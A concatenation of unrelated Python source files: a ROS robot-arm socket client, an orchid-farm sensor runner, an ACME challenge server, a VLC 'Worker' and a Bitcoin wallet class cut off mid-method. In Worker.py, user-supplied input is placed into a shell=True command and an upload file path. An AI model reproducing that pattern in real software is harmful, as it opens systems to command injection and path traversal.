# sent_feedback = Sent_flag_client(Sent_flag)
# #pos_feedback_times = pos_feedback.response
# return sent_feedback
# except rospy.ServiceException as e:
# print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data,Socket_sent_flag,arm_mode_flag
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
#if Arm_feedback == 0:
if arm_mode_flag == True:
arm_mode_flag = False
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
Socket_sent_flag = False
if str(feedback_str[4]) == '49':#回傳1 true
Socket_sent_flag = True
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
runner.py
|
#!/usr/bin/env python
from __future__ import unicode_literals
import os
import re
import time
import django.core.exceptions
from datetime import datetime, timedelta
from threading import Thread
from decimal import Decimal
import paho.mqtt.subscribe as subscribe
from django.core.management.base import BaseCommand
import orchid_app.sensors.anemometer as anemometer
import orchid_app.sensors.max44009 as light
import orchid_app.sensors.yf_201s as water
import orchid_app.sensors.mlx90614 as mlx
import orchid_app.sensors.bme280 as bme
import orchid_app.controller as controller
from orchid_app.models import Sensors, Actions
from orchid_app.utils import sysinfo
import warnings
warnings.filterwarnings('ignore')
POLL_PERIOD = 600 # seconds = 10 minutes
POLL_PERIOD_MIN = POLL_PERIOD / 60 # minutes
MAX_FLOW_RATE = 2.5 # L/minute. This is threshold for emergency water leakage detection. If more than the threshold then close the valves.
MAX_LEAK_RATE = 0.02
MAX_SEND_COUNT = POLL_PERIOD / 10 # Send leakage message once in hour
send_counter_leak = 0
send_counter_flow = 0
water_trigger = False
def avg(l):
'''Convert values of list from str to float if needed. Return average of the collected values.'''
if not l:
return 0.0
pre = [float(i) for i in l]
return round(sum(pre)/len(pre), 2)
class Command(BaseCommand):
help = 'Polls sensors and writes data into the DB.'
# def add_arguments(self, parser):
# parser.add_argument('poll_id', nargs='+', type=int)
def handle(self, *args, **options):
#######################################################################################
################## PREPARATIONS ########################
#######################################################################################
os.system('logger orchid_runner has started in `pwd`')
# Shut down on system start/restart everything could be open.
controller.activate(reason='System startup', force=True, mist=False, drip=False, fan=False, light=False, heat=False)
# Run measure and publishing of GPIO data in background.
threads = [Thread(target=water.run),
Thread(target=anemometer.run),
Thread(target=controller.act_current_state),
]
for t in threads:
t.setDaemon(True)
t.start()
# Keep preliminary data for averaging
data = {'wind': [], 'water': 0.0, 't_amb': [], 't_obj': [], 'hpa': [], 'rh': [], 'lux': []}
ts = time.time()
#######################################################################################
################## MAIN LOOP ########################
#######################################################################################
while True:
if time.time() - ts < POLL_PERIOD:
#######################################################################################
################## SHORT CYCLE ACTIONS, DATA AVERAGING ########################
#######################################################################################
try: # Catch sensor reading data, stay running
# Wait for MQTT data
topic = "shm/orchid/wind/last_min"
data['wind'].append(float(subscribe.simple(topic, keepalive=65, will={'topic': topic, 'payload': 0.0}).payload))
topic = "shm/orchid/water/last_min"
last_water = float(subscribe.simple(topic, keepalive=65, will={'topic': topic, 'payload': 0.0}).payload)
check_water_flow(last_water)
data['water'] += last_water
# Read i2c sensors
a, b, c = bme.readBME280All()
data['t_amb'].append(a)
data['hpa'].append(b)
data['rh'].append(c)
data['t_obj'].append(mlx.Melexis().readObject1())
data['lux'].append(light.readLight())
except Exception as e:
self.stderr.write('On sensors read: %s (%s)' % (e.message, type(e)))
time.sleep(60) # Wait 1 minute before retry.
t_cpu = sysinfo.read_cpu()['temp']['current']
if int(t_cpu) > 80:
os.system('logger orchid_runner CPU temperature %s' % str(t_cpu))
else:
#######################################################################################
################## LONG CYCLE ACTIONS, SD-CARD WRITE ########################
#######################################################################################
n = datetime.now()
s = Sensors()
s.date = n.replace(minute=n.minute / POLL_PERIOD_MIN * POLL_PERIOD_MIN, second=0, microsecond=0) # reduce to poll period resolution
# Data conditioning by model/DB requirements
s.t_amb = Decimal('{:.1f}'.format(avg(data['t_amb'])))
s.t_obj = Decimal('{:.1f}'.format(avg(data['t_obj'])))
s.water = Decimal('{:.1f}'.format(data['water']))
s.wind = Decimal('{:.1f}'.format(avg(data['wind'])))
s.hpa = Decimal('{:.1f}'.format(avg(data['hpa'])))
s.rh = int(avg(data['rh']))
s.lux = int(avg(data['lux']))
# self.stdout.write(str(s))
try: # Catch sensor reading data, stay running
# Write data to the DB
s.save()
# self.stdout.write('Sensor Records: ' + repr(Sensors.objects.count()))
except Exception as e:
self.stderr.write('On DB write: %s (%s)' % (e.message, type(e)))
time.sleep(60) # Wait 1 minute before retry.
# Reset the data structure
data = {'wind': [], 'water': 0.0, 't_amb': [], 't_obj': [], 'hpa': [], 'rh': [], 'lux': []}
ts = time.time()
# # Calculate current state
# controller.read_current_state()
# Example of catch bad data
# try:
# poll = Poll.objects.get(pk=poll_id)
# except Poll.DoesNotExist:
# raise CommandError('Poll "%s" does not exist' % poll_id)
# self.stdout.write(self.style.SUCCESS('Successfully closed poll "%s"' % poll_id))
def check_water_flow(liters):
# Take emergency actions
# Find out which valve is open
la = controller.get_last_action()
if (la.mist or la.water) and liters > MAX_FLOW_RATE:
if is_alert_eligible(is_leak=False):
# Try to shut open valve off
controller.activate(reason='Emergency shut off', force=True, mist=False, water=False,
fan=la.fan, light=la.light, heat=la.heat)
# Build emergency message
msg = 'Water leakage is detected in circuit(s): '
msg += 'drip ' if la.water else ''
msg += 'mist' if la.mist else ''
msg += '\n%s liters of water ran in last minute when should be no more than %s liters/minute.\n' \
'Opened valve closed. This may impact watering and/or temperature conditions.\n' \
'Take actions immediately.' % (str(round(liters, 3)), str(MAX_FLOW_RATE))
subj = 'Orchid farm emergency: water leakage detected'
controller.send_message(subj, msg)
return
# Check leakage when all valves closed
elif (not la.mist and not la.water) and liters > MAX_LEAK_RATE:
global water_trigger
if is_alert_eligible(is_leak=True):
# Try to shut open valve off
controller.activate(reason='Emergency shut off', force=True, mist=False, water=False,
fan=la.fan, light=la.light, heat=la.heat)
# Build emergency message
msg = 'Water leakage is detected while all valves should be closed.'\
'\n%s liters of water leaked in last minute when should be 0.\n' \
'Tried to close all valves. This may impact watering and/or temperature conditions.\n' \
'Take actions immediately.' % str(round(liters, 3))
subj = 'Orchid farm emergency: water leakage detected'
controller.send_message(subj, msg)
print "water leak alert must be sent", str(datetime.now())
water_trigger = None
return
# Check water is running when drip is on
elif la.water and liters <= MAX_LEAK_RATE:
global send_counter_flow
if 0 < send_counter_flow < MAX_SEND_COUNT:
send_counter_flow += 1
print "No water flow alert on hold", str(datetime.now())
return
elif send_counter_flow != 0: # >= MAX_SEND_COUNT
send_counter_flow = 0
return
# Shut the alert! Send_counter_flow == 0 here.
# Build emergency message
msg = "Water isn't flowing while dripping valve is open."\
'\n%s liters of water leaked in last minute when should be more.\n' \
'This may impact watering and/or temperature conditions.\n' \
'Take actions immediately.' % str(round(liters, 3))
subj = 'Orchid farm emergency: no water detected'
controller.send_message(subj, msg)
print "No water alert must be sent", str(datetime.now())
def is_alert_eligible(is_leak=False):
WATER_TIMEOUT = 300
global send_counter_leak
global send_counter_flow
if is_leak:
if 0 < send_counter_leak < MAX_SEND_COUNT:
send_counter_leak += 1
print "water leak alert on hold", str(datetime.now())
elif send_counter_leak != 0:
send_counter_leak = 0
else:
if 0 < send_counter_flow < MAX_SEND_COUNT:
send_counter_flow += 1
print "water flow alert on hold", str(datetime.now())
elif send_counter_flow != 0:
send_counter_flow = 0
if not is_leak and send_counter_flow == 0:
print "water flow alert must be sent", str(datetime.now())
return True
if is_leak and send_counter_leak == 0: # send_counter == 0, shoot the message
global water_trigger
if water_trigger:
dt = (datetime.now() - water_trigger).total_seconds()
# Return True if got second alert in interval of 1-5 minutes from first one.
if 60 < dt < WATER_TIMEOUT:
print "water leakage alert must be sent", str(datetime.now())
return True
elif dt >= WATER_TIMEOUT:
# Remove trigger if first one was long time ago, not relevant anymore.
print "water leak alert expired", str(datetime.now())
water_trigger = None
else:
print "water leak alert triggered", str(datetime.now())
water_trigger = datetime.now()
return False
|
standalone.py
|
"""Support for standalone client challenge solvers. """
import collections
import functools
import http.client as http_client
import http.server as BaseHTTPServer
import logging
import socket
import socketserver
import threading
from typing import List
from acme import challenges
from acme import crypto_util
logger = logging.getLogger(__name__)
class TLSServer(socketserver.TCPServer):
"""Generic TLS Server."""
def __init__(self, *args, **kwargs):
self.ipv6 = kwargs.pop("ipv6", False)
if self.ipv6:
self.address_family = socket.AF_INET6
else:
self.address_family = socket.AF_INET
self.certs = kwargs.pop("certs", {})
self.method = kwargs.pop(
"method", crypto_util._DEFAULT_SSL_METHOD)
self.allow_reuse_address = kwargs.pop("allow_reuse_address", True)
socketserver.TCPServer.__init__(self, *args, **kwargs)
def _wrap_sock(self):
self.socket = crypto_util.SSLSocket(
self.socket, cert_selection=self._cert_selection,
alpn_selection=getattr(self, '_alpn_selection', None),
method=self.method)
def _cert_selection(self, connection): # pragma: no cover
"""Callback selecting certificate for connection."""
server_name = connection.get_servername()
return self.certs.get(server_name, None)
def server_bind(self):
self._wrap_sock()
return socketserver.TCPServer.server_bind(self)
class ACMEServerMixin:
"""ACME server common settings mixin."""
# TODO: c.f. #858
server_version = "ACME client standalone challenge solver"
allow_reuse_address = True
class BaseDualNetworkedServers:
"""Base class for a pair of IPv6 and IPv4 servers that tries to do everything
it's asked for both servers, but where failures in one server don't
affect the other.
If two servers are instantiated, they will serve on the same port.
"""
def __init__(self, ServerClass, server_address, *remaining_args, **kwargs):
port = server_address[1]
self.threads: List[threading.Thread] = []
self.servers: List[socketserver.BaseServer] = []
# Must try True first.
# Ubuntu, for example, will fail to bind to IPv4 if we've already bound
# to IPv6. But that's ok, since it will accept IPv4 connections on the IPv6
# socket. On the other hand, FreeBSD will successfully bind to IPv4 on the
# same port, which means that server will accept the IPv4 connections.
# If Python is compiled without IPv6, we'll error out but (probably) successfully
# create the IPv4 server.
for ip_version in [True, False]:
try:
kwargs["ipv6"] = ip_version
new_address = (server_address[0],) + (port,) + server_address[2:]
new_args = (new_address,) + remaining_args
server = ServerClass(*new_args, **kwargs)
logger.debug(
"Successfully bound to %s:%s using %s", new_address[0],
new_address[1], "IPv6" if ip_version else "IPv4")
except socket.error:
if self.servers:
# Already bound using IPv6.
logger.debug(
"Certbot wasn't able to bind to %s:%s using %s, this "
"is often expected due to the dual stack nature of "
"IPv6 socket implementations.",
new_address[0], new_address[1],
"IPv6" if ip_version else "IPv4")
else:
logger.debug(
"Failed to bind to %s:%s using %s", new_address[0],
new_address[1], "IPv6" if ip_version else "IPv4")
else:
self.servers.append(server)
# If two servers are set up and port 0 was passed in, ensure we always
# bind to the same port for both servers.
port = server.socket.getsockname()[1]
if not self.servers:
raise socket.error("Could not bind to IPv4 or IPv6.")
def serve_forever(self):
"""Wraps socketserver.TCPServer.serve_forever"""
for server in self.servers:
thread = threading.Thread(
target=server.serve_forever)
thread.start()
self.threads.append(thread)
def getsocknames(self):
"""Wraps socketserver.TCPServer.socket.getsockname"""
return [server.socket.getsockname() for server in self.servers]
def shutdown_and_server_close(self):
"""Wraps socketserver.TCPServer.shutdown, socketserver.TCPServer.server_close, and
threading.Thread.join"""
for server in self.servers:
server.shutdown()
server.server_close()
for thread in self.threads:
thread.join()
self.threads = []
class TLSALPN01Server(TLSServer, ACMEServerMixin):
"""TLSALPN01 Server."""
ACME_TLS_1_PROTOCOL = b"acme-tls/1"
def __init__(self, server_address, certs, challenge_certs, ipv6=False):
TLSServer.__init__(
self, server_address, _BaseRequestHandlerWithLogging, certs=certs,
ipv6=ipv6)
self.challenge_certs = challenge_certs
def _cert_selection(self, connection):
# TODO: We would like to serve challenge cert only if asked for it via
# ALPN. To do this, we need to retrieve the list of protos from client
# hello, but this is currently impossible with openssl [0], and ALPN
# negotiation is done after cert selection.
# Therefore, currently we always return challenge cert, and terminate
# handshake in alpn_selection() if ALPN protos are not what we expect.
# [0] https://github.com/openssl/openssl/issues/4952
server_name = connection.get_servername()
logger.debug("Serving challenge cert for server name %s", server_name)
return self.challenge_certs.get(server_name, None)
def _alpn_selection(self, _connection, alpn_protos):
"""Callback to select alpn protocol."""
if len(alpn_protos) == 1 and alpn_protos[0] == self.ACME_TLS_1_PROTOCOL:
logger.debug("Agreed on %s ALPN", self.ACME_TLS_1_PROTOCOL)
return self.ACME_TLS_1_PROTOCOL
logger.debug("Cannot agree on ALPN proto. Got: %s", str(alpn_protos))
# Explicitly close the connection now, by returning an empty string.
# See https://www.pyopenssl.org/en/stable/api/ssl.html#OpenSSL.SSL.Context.set_alpn_select_callback # pylint: disable=line-too-long
return b""
class HTTPServer(BaseHTTPServer.HTTPServer):
"""Generic HTTP Server."""
def __init__(self, *args, **kwargs):
self.ipv6 = kwargs.pop("ipv6", False)
if self.ipv6:
self.address_family = socket.AF_INET6
else:
self.address_family = socket.AF_INET
BaseHTTPServer.HTTPServer.__init__(self, *args, **kwargs)
class HTTP01Server(HTTPServer, ACMEServerMixin):
"""HTTP01 Server."""
def __init__(self, server_address, resources, ipv6=False, timeout=30):
HTTPServer.__init__(
self, server_address, HTTP01RequestHandler.partial_init(
simple_http_resources=resources, timeout=timeout), ipv6=ipv6)
class HTTP01DualNetworkedServers(BaseDualNetworkedServers):
"""HTTP01Server Wrapper. Tries everything for both. Failures for one don't
affect the other."""
def __init__(self, *args, **kwargs):
BaseDualNetworkedServers.__init__(self, HTTP01Server, *args, **kwargs)
class HTTP01RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""HTTP01 challenge handler.
Adheres to the stdlib's `socketserver.BaseRequestHandler` interface.
:ivar set simple_http_resources: A set of `HTTP01Resource`
objects. TODO: better name?
"""
HTTP01Resource = collections.namedtuple(
"HTTP01Resource", "chall response validation")
def __init__(self, *args, **kwargs):
self.simple_http_resources = kwargs.pop("simple_http_resources", set())
self._timeout = kwargs.pop('timeout', 30)
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
self.server: HTTP01Server
# In parent class BaseHTTPRequestHandler, 'timeout' is a class-level property but we
# need to define its value during the initialization phase in HTTP01RequestHandler.
# However MyPy does not appreciate that we dynamically shadow a class-level property
# with an instance-level property (eg. self.timeout = ... in __init__()). So to make
# everyone happy, we statically redefine 'timeout' as a method property, and set the
# timeout value in a new internal instance-level property _timeout.
@property
def timeout(self):
"""
The default timeout this server should apply to requests.
:return: timeout to apply
:rtype: int
"""
return self._timeout
def log_message(self, format, *args): # pylint: disable=redefined-builtin
"""Log arbitrary message."""
logger.debug("%s - - %s", self.client_address[0], format % args)
def handle(self):
"""Handle request."""
self.log_message("Incoming request")
BaseHTTPServer.BaseHTTPRequestHandler.handle(self)
def do_GET(self): # pylint: disable=invalid-name,missing-function-docstring
if self.path == "/":
self.handle_index()
elif self.path.startswith("/" + challenges.HTTP01.URI_ROOT_PATH):
self.handle_simple_http_resource()
else:
self.handle_404()
def handle_index(self):
"""Handle index page."""
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.end_headers()
self.wfile.write(self.server.server_version.encode())
def handle_404(self):
"""Handler 404 Not Found errors."""
self.send_response(http_client.NOT_FOUND, message="Not Found")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(b"404")
def handle_simple_http_resource(self):
"""Handle HTTP01 provisioned resources."""
for resource in self.simple_http_resources:
if resource.chall.path == self.path:
self.log_message("Serving HTTP01 with token %r",
resource.chall.encode("token"))
self.send_response(http_client.OK)
self.end_headers()
self.wfile.write(resource.validation.encode())
return
else: # pylint: disable=useless-else-on-loop
self.log_message("No resources to serve")
self.log_message("%s does not correspond to any resource. ignoring",
self.path)
@classmethod
def partial_init(cls, simple_http_resources, timeout):
"""Partially initialize this handler.
This is useful because `socketserver.BaseServer` takes
uninitialized handler and initializes it with the current
request.
"""
return functools.partial(
cls, simple_http_resources=simple_http_resources,
timeout=timeout)
class _BaseRequestHandlerWithLogging(socketserver.BaseRequestHandler):
"""BaseRequestHandler with logging."""
def log_message(self, format, *args): # pylint: disable=redefined-builtin
"""Log arbitrary message."""
logger.debug("%s - - %s", self.client_address[0], format % args)
def handle(self):
"""Handle request."""
self.log_message("Incoming request")
socketserver.BaseRequestHandler.handle(self)
|
Worker.py
|
import os
import sys
from pathlib import Path
from subprocess import Popen, PIPE
from threading import Thread
from time import sleep
from bin.Setup import Setup
from bin.Utils import Utils, Singleton
@Singleton
class Worker:
current_process = None
tmp_files = []
def manage_command(self, form):
try:
command = form.getvalue('COMMAND')
except KeyError:
print("ERROR : No command given", file=sys.stderr)
return 400
try:
if command == "PLAY_NEW_STREAM":
return self.play_new_stream(form)
elif command == "PLAY_NEW_FILE":
return self.play_new_file(form)
elif command == "PING":
return 200
elif command == "PROCESS_STATUS":
return 102 if self.process_running() else 100
else:
return 405
except KeyError as e:
print("ERROR : Missing parameter(s) : ", e, file=sys.stderr)
return 400
except RuntimeError as e:
print(e, file=sys.stderr)
return 409
def play_new_stream(self, form):
source = form.getvalue('STREAM_SOURCE')
if source is None:
raise KeyError("STREAM_SOURCE")
self.play_single_on_vlc(source)
return 200
def play_single_on_vlc(self, source):
if not self.process_running():
vlc = Utils.get_vlc_default()
vlc_path = vlc[0]
vlc_cmd = vlc[1] + ' "' + source + '" ' + Setup.VLC_PLAYLIST_END
self.execute(vlc_cmd, vlc_path)
else:
raise RuntimeError("Process already running")
def play_new_file(self, form):
filename = os.path.join(Path(__file__).parents[1], "tmp", form.getvalue("FILENAME"))
length = int(form.headers['Content-Length'])
toto = form['FILE'].file
with open(filename, 'wb+') as f:
f.write(form['FILE'].file.read(length))
self.tmp_files.append(filename)
self.play_single_on_vlc(filename)
return 200
def execute(self, cmd, path):
self.current_process = Popen(cmd, stdout=PIPE, bufsize=1, close_fds=Setup.POSIX, shell=True, cwd=path)
process_watchdog = Thread(target=self._process_end, daemon=True)
process_watchdog.start()
def process_running(self):
if self.current_process is None:
return False
if self.current_process.poll() is None:
return True
else:
self.current_process = None
return False
def _process_end(self):
while self.process_running():
sleep(60)
while self.tmp_files:
file = self.tmp_files.pop()
if os.path.isfile(file):
os.remove(file)
|
wallet.py
|
import copy, hashlib, json, logging, os
import time
from .device import Device
from .key import Key
from .util.merkleblock import is_valid_merkle_proof
from .helpers import der_to_bytes
from .util.base58 import decode_base58
from .util.descriptor import Descriptor, sort_descriptor, AddChecksum
from .util.xpub import get_xpub_fingerprint
from .util.tx import decoderawtransaction
from .persistence import write_json_file, delete_file
from hwilib.serializations import PSBT, CTransaction
from io import BytesIO
from .specter_error import SpecterError
import threading
import requests
from math import ceil
from .addresslist import AddressList
from .txlist import TxList
logger = logging.getLogger()
class Wallet:
# if the wallet is old we import 300 addresses
IMPORT_KEYPOOL = 300
# a gap of 20 addresses is what many wallets do
GAP_LIMIT = 20
# minimal fee rate is slightly above 1 sat/vbyte
# to avoid rounding errors
MIN_FEE_RATE = 1.01
def __init__(
self,
name,
alias,
description,
address_type,
address,
address_index,
change_address,
change_index,
keypool,
change_keypool,
recv_descriptor,
change_descriptor,
keys,
devices,
sigs_required,
pending_psbts,
fullpath,
device_manager,
manager,
old_format_detected=False,
last_block=None,
):
self.name = name
self.alias = alias
self.description = description
self.address_type = address_type
self.address = address
self.address_index = address_index
self.change_address = change_address
self.change_index = change_index
self.keypool = keypool
self.change_keypool = change_keypool
self.recv_descriptor = recv_descriptor
self.change_descriptor = change_descriptor
self.keys = keys
self.devices = [
(
device
if isinstance(device, Device)
else device_manager.get_by_alias(device)
)
for device in devices
]
if None in self.devices:
raise Exception("A device used by this wallet could not have been found!")
self.sigs_required = int(sigs_required)
self.pending_psbts = pending_psbts
self.fullpath = fullpath
self.manager = manager
self.rpc = self.manager.rpc.wallet(
os.path.join(self.manager.rpc_path, self.alias)
)
self.last_block = last_block
addr_path = self.fullpath.replace(".json", "_addr.csv")
self._addresses = AddressList(addr_path, self.rpc)
if not self._addresses.file_exists:
self.fetch_labels()
txs_path = self.fullpath.replace(".json", "_txs.csv")
self._transactions = TxList(
txs_path, self.rpc, self._addresses, self.manager.chain
)
if address == "":
self.getnewaddress()
if change_address == "":
self.getnewaddress(change=True)
self.update()
if old_format_detected or self.last_block != last_block:
self.save_to_file()
def fetch_labels(self):
"""Load addresses and labels to self._addresses"""
recv = [
dict(
address=self.get_address(idx, change=False, check_keypool=False),
index=idx,
change=False,
)
for idx in range(self.keypool)
]
change = [
dict(
address=self.get_address(idx, change=True, check_keypool=False),
index=idx,
change=True,
)
for idx in range(self.change_keypool)
]
# TODO: load addresses for all txs here as well
self._addresses.add(recv + change, check_rpc=True)
def fetch_transactions(self):
"""Load transactions from Bitcoin Core"""
arr = []
idx = 0
batch = 100
while True:
res = self.rpc.listtransactions("*", batch, batch * idx, True)
res = [
tx
for tx in res
if tx["txid"] not in self._transactions
or self._transactions[tx["txid"]].get("blockhash", None)
!= tx.get("blockhash", None)
or self._transactions[tx["txid"]].get("conflicts", [])
!= tx.get("walletconflicts", [])
]
# TODO: Looks like Core ignore a consolidation (self-transfer) going into the change address (in listtransactions)
# This means it'll show unconfirmed for us forever...
arr.extend(res)
idx += 1
# not sure if Core <20 returns last batch or empty array at the end
if len(res) < batch or len(arr) < batch * idx:
break
txs = dict.fromkeys([a["txid"] for a in arr])
txids = list(txs.keys())
# get all raw transactions
res = self.rpc.multi([("gettransaction", txid) for txid in txids])
for i, r in enumerate(res):
txid = txids[i]
# check if we already added it
if txs.get(txid, None) is not None:
continue
txs[txid] = r["result"]
self._transactions.add(txs)
def update(self):
self.getdata()
self.get_balance()
self.check_addresses()
def check_unused(self):
"""Check current receive address is unused and get new if needed"""
addr = self.address
while self.rpc.getreceivedbyaddress(addr, 0) != 0:
addr = self.getnewaddress()
def check_addresses(self):
"""Checking the gap limit is still ok"""
if self.last_block is None:
obj = self.rpc.listsinceblock()
else:
# sometimes last_block is invalid, not sure why
try:
obj = self.rpc.listsinceblock(self.last_block)
except:
logger.error(f"Invalid block {self.last_block}")
obj = self.rpc.listsinceblock()
txs = obj["transactions"]
last_block = obj["lastblock"]
addresses = [tx["address"] for tx in txs]
# remove duplicates
addresses = list(dict.fromkeys(addresses))
max_recv = self.address_index - 1
max_change = self.change_index - 1
# get max used from addresses list
max_recv = max(max_recv, self._addresses.max_used_index(False))
max_change = max(max_change, self._addresses.max_used_index(True))
# from tx list
for addr in addresses:
if addr in self._addresses:
a = self._addresses[addr]
if a.index is not None:
if a.change:
max_change = max(max_change, a.index)
else:
max_recv = max(max_recv, a.index)
updated = False
while max_recv >= self.address_index:
self.getnewaddress(change=False, save=False)
updated = True
while max_change >= self.change_index:
self.getnewaddress(change=True, save=False)
updated = True
# save only if needed
if updated:
self.save_to_file()
self.last_block = last_block
@staticmethod
def parse_old_format(wallet_dict, device_manager):
old_format_detected = False
new_dict = {}
new_dict.update(wallet_dict)
if "key" in wallet_dict:
new_dict["keys"] = [wallet_dict["key"]]
del new_dict["key"]
old_format_detected = True
if "device" in wallet_dict:
new_dict["devices"] = [wallet_dict["device"]]
del new_dict["device"]
old_format_detected = True
devices = [
device_manager.get_by_alias(device) for device in new_dict["devices"]
]
if (
len(new_dict["keys"]) > 1
and "sortedmulti" not in new_dict["recv_descriptor"]
):
new_dict["recv_descriptor"] = AddChecksum(
new_dict["recv_descriptor"]
.replace("multi", "sortedmulti")
.split("#")[0]
)
old_format_detected = True
if (
len(new_dict["keys"]) > 1
and "sortedmulti" not in new_dict["change_descriptor"]
):
new_dict["change_descriptor"] = AddChecksum(
new_dict["change_descriptor"]
.replace("multi", "sortedmulti")
.split("#")[0]
)
old_format_detected = True
if None in devices:
devices = [
(
(device["name"] if isinstance(device, dict) else device)
if (device["name"] if isinstance(device, dict) else device)
in device_manager.devices
else None
)
for device in new_dict["devices"]
]
if None in devices:
logger.error("A device used by this wallet could not have been found!")
return
else:
new_dict["devices"] = [
device_manager.devices[device].alias for device in devices
]
old_format_detected = True
new_dict["old_format_detected"] = old_format_detected
return new_dict
@classmethod
def from_json(
cls, wallet_dict, device_manager, manager, default_alias="", default_fullpath=""
):
name = wallet_dict.get("name", "")
alias = wallet_dict.get("alias", default_alias)
description = wallet_dict.get("description", "")
address = wallet_dict.get("address", "")
address_index = wallet_dict.get("address_index", 0)
change_address = wallet_dict.get("change_address", "")
change_index = wallet_dict.get("change_index", 0)
keypool = wallet_dict.get("keypool", 0)
change_keypool = wallet_dict.get("change_keypool", 0)
sigs_required = wallet_dict.get("sigs_required", 1)
